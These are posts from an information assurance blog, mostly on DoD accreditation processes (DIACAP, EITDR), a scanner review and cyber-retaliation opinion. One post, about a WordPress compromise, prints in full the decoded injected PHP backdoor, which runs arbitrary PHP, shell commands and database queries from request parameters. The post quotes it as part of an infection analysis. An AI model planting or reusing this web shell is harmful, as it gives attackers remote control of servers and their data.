security blog » information assurance

UPDATED IA STUFF + Procrastination

elamb.security — Wed, 27 Jan 2010 07:13:40 +0000

My greatest skill is procrastination. I really am the best, most skilled procrastinator I know. It takes all of my will power to stay consistent with anything, including this blog, which is why (among other things) I am not banking like Darren Rowse or Steve Pav, two of my favorite bloggers.

YOU SEE, I am such a good procrastinator that I JUST procrastinated on getting to the REAL subject of this article, security, IA updates.

A fellow IA Analyst wrote me with questions that got right to the heart of IA… change.

She asked about AFI 33-202.
And I said:

Right as I felt I had mastered the contents of 33-202, the airforce moved to 33-210 (to replace all its C&A stuff). I believe 33-202 is now obsolete and replaced with 33-200 & 33-202 and others.. last time I was with the AF, anyway.

What about IT LEAN?
I said:

As for IT Lean, you can find that on AF Knowledge Now site and I think they have links to it on EITDR. If you are interested in IT Lean you’ll be REALLY interested in 33-210:
33-210

But if you are working with the Air Force and want more on the IT LEAN process you should be digging into AFCAP, Air Force Certification & Accreditation Program, an AF version of IT Lean.

CNSS 1253:
A lot of people also ask me to send them a copy of the CNSSI 12-53. But it is actually OUT. Its the CNSSI 1253. I, personally, have not had any clear direction (currently NO direction) on how to start moving some of the CNSSI to the systems I work on. I suspect that the Govt. will start this within the next couple of years and start phasing out DIACAP.. but who the hell knows what a bureaucracy of their size will do next!

Lastly, my fellow IA Analyst asked me about EITDR
and I said:

You’ll find the EITDR POCs on the Air Force Portal or Knowledge Now. Log on to the Air Force Portal (if you don’t have an account get one.. you may have to get sponsor by the Govt to get it). Once on the AF Portal search for EITDR and they’ll have tons of stuff on it. Waaaaay more stuff than you want to read. You’ll also find the person you need to start the EITDR process with.

Server at Magic Requires Username Password

elamb.security — Sat, 08 Aug 2009 05:32:08 +0000

The Wordpress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

Wordpress user Yokima reported this very slick hack.

FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{


if (!function_exists('______safeshell'))
{
function ______safeshell($komut) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
if (!empty ($komut)) {
if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
//@ ob_start();
@ passthru($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('system') && !in_array('system', $disable_functions)) {
//@ ob_start();
@ system($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
$res = @ shell_exec($komut);
echo $res;
}
elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
@ exec($komut, $res);
$res = join("\n", $res);
echo $res, "\n";
}
elseif (@ is_resource($f = @ popen($komut, "r"))) {
//$res = "";
while (!@ feof($f)) {
//$res .= @ fread($f, 1024);
echo(@ fread($f, 1024));
}
@ pclose($f);
}
else
{
$res = {$komut};
echo $res;
}
}
}
};
if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
echo "
\n";
if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
if (!$result)
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
die();
}
else if (is_resource($result))
{
$res = array();
while ($row = mysql_fetch_assoc($result))
{
$res[] = $row;
};
mysql_free_result($result);
echo serialize($res);
die();
}
else
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
die();
}
};
echo "\n\n";
die();
};

};

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

GFI LANGuard – Review

elamb.security — Sat, 08 Aug 2009 03:47:38 +0000

I was given the honor of reviewing GFI LANguard network and security scanner. Right off the bat I notice that the interface is very intuitive & easy to use, which is important to a busy security professional that have better things to do with their time than fight with a messy
security tool.

The network scanning tool I normally use is called Retina.
When lining the two up, I have to say Retina is much more powerful, with many more options built in. It can drill way down and do intrusive scans where GFI LANguard v.9 is pretty vanilla. It gives you what you need and that is it.

The simplicity could be an advantage to a system admin doing a security job, because it really is straight to the point. The cost is definitely and advantage. GFI LANguard is about ½ the cost of the Retina Scan tool.

Retina Professional Edition 16 IP Pack – $995.00

GFI LAN Guard goes for about 300+ for 10 licences.

Nessus is considered one of the best network scan tools but its more expensive then both.

What I really like about Retina is that it allows you to scan in accordance with Department of Defense standards, SAN, and others. Languard does look at the SANS Top 20 report vulnerabilities.

If your looking for basic, down to Earth network & security scanner for your small to medium business needs, than GFI Languard is definitely the way to go because you will not beat the cost for the quality and support you get. Its going to give you a thorough assessment of the your systems and even tell you how to fix them. Buy this product!

DIACAP Essentials + IA Control Validation Training (part 4): DIACAP/AFCAP Day 4 & 5

elamb.security — Fri, 03 Jul 2009 05:21:11 +0000

Days 4 & 5 bring the DIACAP/AFCAP Essentials Class to a close. The
biggest things I learned were: CNSSI 4009 is the the official glossary of DOD IA, there is a big difference between theory, policy and practice, Agents of the Certifying Authority (ACA) are official validators and there is a difference between acquisition Mission criticality and IA MAC levels.

Stuff I learned from people in the class:

-AFCA is changing its name (to what?)

DOD is going to put the new IA controls in NCSSI 12-53 (currently in draft)

-a lot of what I need in there is in NIST 800-53

Marines use something called Exacta

Site called securitycritics.org

33-202 is now completely irrelevant and obsolete (not even mentioned ONCE in the class)

800-30

Feds call Certification &Accreditation (C&A) “Security authorization”

NIST SP 800-37

Day 4:

Validator Activities & Issue Accreditation Decision

Prepare POA&M

Validate Results/Scorecard

Scorecard

Make certification determination

CA/DAA Package review

Day 5:

Validation procedures were discussed. On day five, we looked at how the validators look at a system.

I thought is was interesting. It should help me get through the EITDR/DIACAP process easier.

Maintain Situational Awareness

Maintain IA Posture

Conduct Review

R-Accreditation

Retire system

DIACAP Essentials + IA Control Validation Training (part 4): DIACAP/AFCAP Day3

elamb.security — Fri, 03 Jul 2009 04:37:14 +0000

Day 3 heats up a little. We start talking about what it take to actually get validated. The DIACAP Implementers Guide & the DIACAP Validators guide is opened up and reviewed. I think we all learned a little something during this discussion because there have been some challenges with this. Unfortunately, we don’t to far into the validator stuff.

Day 3:

DIACAP Structure

Terminology Review

Assemble DIACAP Team

Registered System/System Information Profile

Assign IA Controls

Initiate DIACAP Implementation Plan

DIACAP Essentials + IA Control Validation Training (part 2): DIACAP/AFCAP Day1

elamb.security — Tue, 23 Jun 2009 01:29:26 +0000

DIACAP/AFCAP Day 1.
This is the second installment of the DIACAP Essentials journal.

In the first day of class we’ve taken a high level look at the big picture of the Department of Defense Information Assurance Certification & Accreditation Process (DIACAP) and Air Force Certification & Accreditation Program (AFCAP). It is a very valuable tool for a beginner.

Since I’ve gone through the entire process (with a legacy system) more than once through all the growing pains of Air Force C&A from DITSCAP to DIACAP, I found that I knew about 90% of everything taught. I don’t mind having a refresher, though and quite frankly, I need the CPE’s for my CISSP .

There were a couple of golden nuggets that I’ve been able to get out of some of the old timers. I learned some interesting things about how the Navy, Marines and Army do things.
Navy (as weird as their dumb ass rank system.. yep, I said it.. its dumb) have like three systems: DITPR-DON, DA-DUMB and some other BS, Marines have something called Exacta and the Army has APMS (Army Profile Management System). Also learned cool off topic stuff like history of eMass.

I must admit I’m looking forward to day two.
pros of day 1: Good solid start on basics GREAT for beginners. SecureInfo gets mad props for have a great instructor John M.(don’t know if he wants his full name published.. but he’s highly, highly knowledgeable and very positive).

cons of day 1: Right off the bat I am noticing a huge hole in the training… a lack of in depth teaching of EITDR, which is how the Air Force implements, manages and maintains the entire DIACAP/AFCAP process. I don’t really see how you can teach one without the other these days. I guess contractually, SecureInfo can not touch it since some other company has the contract. But unfortunately, the folks that are new to this are going to suffer. Because if they goto this class without knowing the EITDR they will know why but now how, and if they go to the EITDR class without knowing the DIACAP they will know how but not Why.

DIACAP Essentials + IA Control Validation Training (part 1)

elamb.security — Wed, 10 Jun 2009 04:49:25 +0000

I’ve been scheduled to go to DIACAP Essentials + IA Control Validation training. It is the same training that is given to validators at AFCA, so I guess it is pretty serious stuff. I was very reluctant to go until I realized that I actually really need the CPE’s to maintain my CISSP.

Since I’ve been doing the DIACAP stuff for about 2 years now, I’m not certain there is any new information for me to learn.

DIACAP Essentials
The Department of Defense Information Assurance Certification and
Accreditation Process (DIACAP) Essentials course blends lecture and hands-on
exercises to introduce students to DIACAP policy (to include FISMA
requirements of a comprehensive, repeatable, and auditable Information
Security process).

IA Control Validation In-Depth - 3 Days
The IA Control Validation In-Depth course takes the students DIACAP
education and turns the view from an implementor to a Validator perspective
and involves the students in the validation process for the IA Controls
(DoDI 8500.2).

What I am hoping to get from the course is a better handle on the FISMA process.
I don’t feel like I really have a handle on what is supposed to happen with it.

You Hack US, We Nuke You!

elamb.security — Fri, 29 May 2009 01:51:46 +0000

The United States’ top commanding officer for the space and cyber domains told reporters last week that a cyber attack could merit a more conventional military response.

During a press briefing on Thursday, U.S. Air Force General Kevin Chilton, who heads the U.S. Strategic Command, told reporters that top Pentagon advisors would not rule out a physical attack on any force that attacks the United States through the Internet. Currently, the military’s networks are probed thousands of times a day, but the goal of attackers seems to be espionage, not to take down critical networks, he told reporters –

– Security Focus

I don’t believe that military force is the equivalent action for a cyber attack. Arrest and/or apprehension is the physical response necessary for criminal hackers attacking from other countries. Cyber counter-attacks are the correct response for government funded & coordinated attacks.

I think if the U.S. reciprocates a cyber attack x10 when other countries are playing little games, we’d get our message across effectively. We should do so in a well funded and covert way in which the enemy has NO DOUBT that the face slap came from a U.S, hand, but no proof at all allowing plausible deniability. It should be black Ops hacks, very well coordinated, very well funded and full time.

I don’t think the US can be complacent or wrecklessly meek in matters of cyber warfare. Instead, it must be fair, quiet and heavy handed when it comes to one of its most valuable asset, information.

Validation: Track the Results

elamb.security — Tue, 26 May 2009 22:29:26 +0000

If you are doing Certification & Accreditation then you know it’s all about the documentation.

But its not just about reviewing the documentation that a system is supposed to have. If you’re in the business of getting systems validated sometimes you’ll have to produce the documentation.

An IA Analyst, system security engineer or Information Assurance Officer (IAO) usually documents the results of their security tests. For example, if they run a Retina Scan they will want to generate a report that has the results of that network or system scan.

DoD Information Assurance Certification & Accreditation (DIACAP) Knowledge Service, the Enterprise Information Technology Data Repository (EITDR) and other IT profile databases have very detailed information on what the final Validators are looking for.

If you’re in line with the final validators you will not have much of a problem, because they will approve the system and move it on to the Designated Approval Authority (DAA).

Dangers of Surfing the Web with an Admin Account

elamb.security — Sat, 16 May 2009 03:50:52 +0000

If you bought a Dell or Gateway, more than likely you only have one account on your computer with no password. That account runs as the administrator. If your system has no user name or password applied, it is running as an administrator account.

This is how so many people get viruses. When you surf the web as an administrator is allows malicious applications (viruses, worms, Trojans and other malware) to download to your computer and run as the administrator. This means they can replace system files with viruses, create back doors and harm other computers on your network. They can also spy on you manipulate your browser or do anything else they want to do.

One way to greatly minimize the effects of viruses is to create accounts on your system and only use the administrator account when its necessary. Create a limited user account that you use when surfing the web, getting into your email or doing other small tasks that don’t require downloading or installing applications.

With a limited account, even if the malware is downloaded, it will not be able to install.